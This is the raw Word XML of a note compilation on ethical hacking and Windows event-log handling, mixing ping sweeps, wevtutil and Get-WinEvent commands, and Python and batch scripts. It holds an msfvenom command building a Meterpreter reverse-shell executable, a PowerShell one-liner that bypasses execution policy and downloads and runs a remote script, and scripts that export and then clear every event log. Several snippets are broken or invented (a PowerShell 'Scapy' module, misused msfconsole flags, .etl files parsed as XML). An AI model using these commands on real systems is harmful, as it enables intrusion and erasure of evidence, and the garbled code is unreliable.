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Examples and Commands:</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CMD Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Ping Sweep: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for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i | find "Reply"</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Netstat: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netstat -ano</w:t>
        <w:br w:type="textWrapping"/>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Exploiting with Metasploit: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msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;your_ip&gt; LPORT=&lt;your_port&gt; -f exe -o payload.exe</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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PowerShell Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Get-NetTCPConnection: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Get-NetTCPConnection</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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PowerShell Empire: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powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/setup/install.ps1'); Start-Sleep 5; Invoke-Empire"</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Event Log Analysis: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Copy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Get-WinEvent -FilterHashTable @{LogName='Security'; ID=4624} | Select-Object -First 10</w:t>
        <w:br w:type="textWrapping"/>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the examples provided here are basic and may not cover all the advanced techniques. Ethical hacking requires extensive knowledge and experience, and it is recommended to pursue proper training and certification in this field.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simple CMD code snippet that demonstrates how to use the findstr command to filter event logs based on their level (in this case, only critical events are displayed):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off</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">setlocal enabledelayedexpansion</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">:: Create a sample event log array</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">set eventLogs[0]=1001 Critical Event 1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">set eventLogs[1]=2002 Information Event 2</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">set eventLogs[2]=3003 Warning Event 3</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">set eventLogs[3]=4004 Error Event 4</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">set eventLogs[4]=5005 Critical Event 5</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">:: Iterate through the array and simulate the process of reading event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /L %%a in (0, 1, 4) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    for /f "tokens=1-3 delims=," %%A in ("!eventLogs[%%a]!") do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        set "eventID=%%A"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        set "eventLevel=%%B"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        set "eventDescription=%%C"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        :: Filter event logs based on their level</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        if "!eventLevel!" == "Critical" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            echo Event ID: !eventID! - Event Level: !eventLevel! - Event Description: !eventDescription!</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">endlocal</w:t>
        <w:br w:type="textWrapping"/>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code snippet demonstrates how to filter event logs based on their level. You can expand upon this code by incorporating the findstr command or other relevant commands to filter and analyze event logs further.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 Advanced Code for Ethical Hacking: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os</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">import subprocess</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 1. Event Log Analysis with wevtutil</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def wevtutil_analysis(log_name, query):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"wevtutil qe {log_name} /q:{query}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 2. Network Scanning with Nmap</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def nmap_scan(target, ports):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"nmap -p {ports} {target}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 3. Packet Crafting with Scapy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def scapy_packet_craft(packet_type, src_ip, dst_ip, data):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    packet = Ether(src=src_ip, dst=dst_ip) / IP(src=src_ip, dst=dst_ip) / packet_type(data=data)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return packet</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 4. Cyber Security Code</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def cyber_security_check(url):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"curl -s {url} | grep -i 'security'"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 5. Windows Installable .exe Tool</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Assuming you have Metasploit installed</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">metasploit_path = r"C:\Program Files\Metasploit\msfconsole.exe"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def metasploit_exploit(exploit_name, target):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"{metasploit_path} -x {exploit_name} -t {target}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    subprocess.call(command, shell=True)</w:t>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 Commands for CMD and PowerShell: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CMD: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routeros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Event Log Analysis</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /q:"EventLevel=Error"</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Network Scanning</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">nmap -p 80,443 example.com</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Packet Crafting (using Scapy)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">scapy -p Ether/IP/TCP src=192.168.1.10 dst=192.168.1.20 data="Hello World"</w:t>
        <w:br w:type="textWrapping"/>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PowerShell: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routeros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Event Log Analysis</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -LogName System -FilterHashtable @{Level=Error}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Network Scanning</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://example.com -Port 80</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Packet Crafting (using Scapy)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Import-Module Scapy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Send(Ether()/IP()/TCP(dport=80, data="Hello World"))</w:t>
        <w:br w:type="textWrapping"/>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 Suggested Best Code for Ethical Hacking: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os</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">import subprocess</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 1. Event Log Analysis with wevtutil</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def wevtutil_analysis(log_name, query):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"wevtutil qe {log_name} /q:{query}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 2. Network Scanning with Nmap</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def nmap_scan(target, ports):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"nmap -p {ports} {target}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 3. Packet Crafting with Scapy</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def scapy_packet_craft(packet_type, src_ip, dst_ip, data):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    packet = Ether(src=src_ip, dst=dst_ip) / IP(src=src_ip, dst=dst_ip) / packet_type(data=data)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return packet</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 4. Cyber Security Check</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def cyber_security_check(url):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"curl -s {url} | grep -i 'security'"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    return output.decode("utf-8")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># 5. Windows Installable .exe Tool</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Assuming you have Metasploit installed</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">metasploit_path = r"C:\Program Files\Metasploit\msfconsole.exe"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def metasploit_exploit(exploit_name, target):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    command = f"{metasploit_path} -x {exploit_name} -t {target}"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    subprocess.call(command, shell=True)</w:t>
        <w:br w:type="textWrapping"/>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sample solution using wevtutil for querying and exporting event logs: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List all available event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil el</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Query the System log for Error events with ID 1001</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /c:1 /f:Text /q:"Event[System[(EventID=1001)]]" /rd:true &gt; Error1001.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Export the Security log to a file</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil epl Security SecurityLog.evtx</w:t>
        <w:br w:type="textWrapping"/>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code first lists all the event logs available on the system. Then, it queries the System log for Error events with Event ID 1001 and exports the results to a text file. Finally, it exports the entire Security log to an EVTX file.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Windows CMD &amp; PowerShell Commands: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REM Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil el</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Export event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil epl Application C:\EventLogs\Application.etl</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil cl Application</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /q:"Event[System[EventID=6005]]" /rd:true</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe Security /q:"Event[Security[EventID=4624 and Keyword[0x8000000000000002]]]" /rd:true</w:t>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Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -ListLog *</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Export event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -LogName Application -MaxEvents 100 | Export-Csv -Path C:\EventLogs\Application.csv</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Clear-EventLog -LogName Application</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="System"; ID=6005}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="Security"; ID=4624; ProviderName="Microsoft-Windows-Security-Auditing"; Keywords=0x8000000000000002}</w:t>
        <w:br w:type="textWrapping"/>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Advanced Python Script with Kali Linux Tools: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subprocess</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">import csv</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">import xml.etree.ElementTree as ET</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def fetch_event_logs(log_name):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    cmd = f"wevtutil epl {log_name} {log_name}.etl"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    subprocess.call(cmd, shell=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def xml_to_csv(log_name):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    with open(log_name + ".etl", "rb") as f:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        etl_file = ET.ElementTree(file=f)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        root = etl_file.getroot()</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    with open(log_name + ".csv", "w", newline="") as csvfile:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        fieldnames = ["TimeGenerated", "EventID", "EventSource", "Message"]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        writer.writeheader()</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        for event in root.findall(".//Event"):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            time_generated = event.find(".//System/TimeCreated/@SystemTime")</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            event_id = event.find(".//System/EventID")</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            event_source = event.find(".//System/Provider/@Name")</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            message = event.find(".//EventData/Data")</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            writer.writerow({</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                "TimeGenerated": time_generated.text,</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                "EventID": event_id.text,</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                "EventSource": event_source.text,</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                "Message": message.text</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">            })</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def filter_events(log_name, event_id, keyword):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    cmd = f"wevtutil qe {log_name} /q:Event[System[EventID={event_id} and Keyword[0x{keyword:016x}]]] /rd:true"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    output = subprocess.check_output(cmd, shell=True, universal_newlines=True)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if output:</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        print(output)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">def main():</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    log_name = "Application"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    fetch_event_logs(log_name)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    xml_to_csv(log_name)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    filter_events(log_name, 6005, 0x8000000000000002)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">if __name__ == "__main__":</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    main()</w:t>
        <w:br w:type="textWrapping"/>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Best Windows Installable .exe Tool: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use "LogParser Lizard"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CMD Script (event_log_checker.cmd):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off</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Fetching event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil el &gt; event_logs.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Export event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Exporting event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /F "tokens=1 delims=:" %%i in (event_logs.txt) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if not "%%i"=="" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        wevtutil epl "%%i" "%%i.etl"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Clearing event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /F "tokens=1 delims=:" %%i in (event_logs.txt) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if not "%%i"=="" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        wevtutil cl "%%i"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Filtering events by event ID...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /q:"Event[System[EventID=6005]]" /rd:true &gt; event_id_6005.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Filtering events by log name and keyword...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe Security /q:"Event[Security[EventID=4624 and Keyword[0x8000000000000002]]]" /rd:true &gt; event_log_name_and_keyword.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Event log analysis and management completed successfully!</w:t>
        <w:br w:type="textWrapping"/>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PowerShell Script (event_log_checker.ps1):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Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -ListLog * | Select-Object -Property LogName | Export-Csv -Path event_logs.csv</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Export event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Import-Csv -Path event_logs.csv | ForEach-Object {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    $logName = $_.LogName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Get-WinEvent -LogName $logName -MaxEvents 100 | Export-Csv -Path "$logName.csv" -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Import-Csv -Path event_logs.csv | ForEach-Object {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    $logName = $_.LogName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    Clear-EventLog -LogName $logName</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="System"; ID=6005} | Export-Csv -Path event_id_6005.csv -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -FilterHashtable @{LogName="Security"; ID=4624; ProviderName="Microsoft-Windows-Security-Auditing"; Keywords=0x8000000000000002} | Export-Csv -Path event_log_name_and_keyword.csv -NoTypeInformation</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Write-Host "Event log analysis and management completed successfully!"</w:t>
        <w:br w:type="textWrapping"/>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find the scripts below, and note that they require administrative privileges to execute properly.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CMD Script (event_log_checker_advanced.cmd):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off</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Fetching event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil el &gt; event_logs.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Export event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Exporting event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /F "tokens=1 delims=:" %%i in (event_logs.txt) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if not "%%i"=="" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        wevtutil epl "%%i" "%%i.etl"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Clear event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Clearing event logs...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /F "tokens=1 delims=:" %%i in (event_logs.txt) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if not "%%i"=="" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        wevtutil cl "%%i"</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by event ID</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Filtering events by event ID...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe System /q:"Event[System[EventID=6005]]" /rd:true &gt; event_id_6005.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Filter events by log name and keyword</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Filtering events by log name and keyword...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">wevtutil qe Security /q:"Event[Security[EventID=4624 and Keyword[0x8000000000000002]]]" /rd:true &gt; event_log_name_and_keyword.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">REM Analyze event logs for potential security incidents</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Analyzing event logs for potential security incidents...</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">for /F "tokens=1 delims=:" %%i in (event_logs.txt) do (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    if not "%%i"=="" (</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        echo Processing log: %%i</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        wevtutil qe "%%i" /q:"Event[System[(Level=1 or Level=2)]]" /rd:true &gt;&gt; security_incidents.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    )</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">)</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">echo Event log analysis and management completed successfully!</w:t>
        <w:br w:type="textWrapping"/>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PowerShell Script (event_log_checker_advanced.ps1):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powershell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Fetch event logs</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Get-WinEvent -ListLog * | Select-Object -Property LogName | Export-Csv -Path event_logs.csv</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Export event logs</w:t>
        <w:br w:type="textWrapping"/>
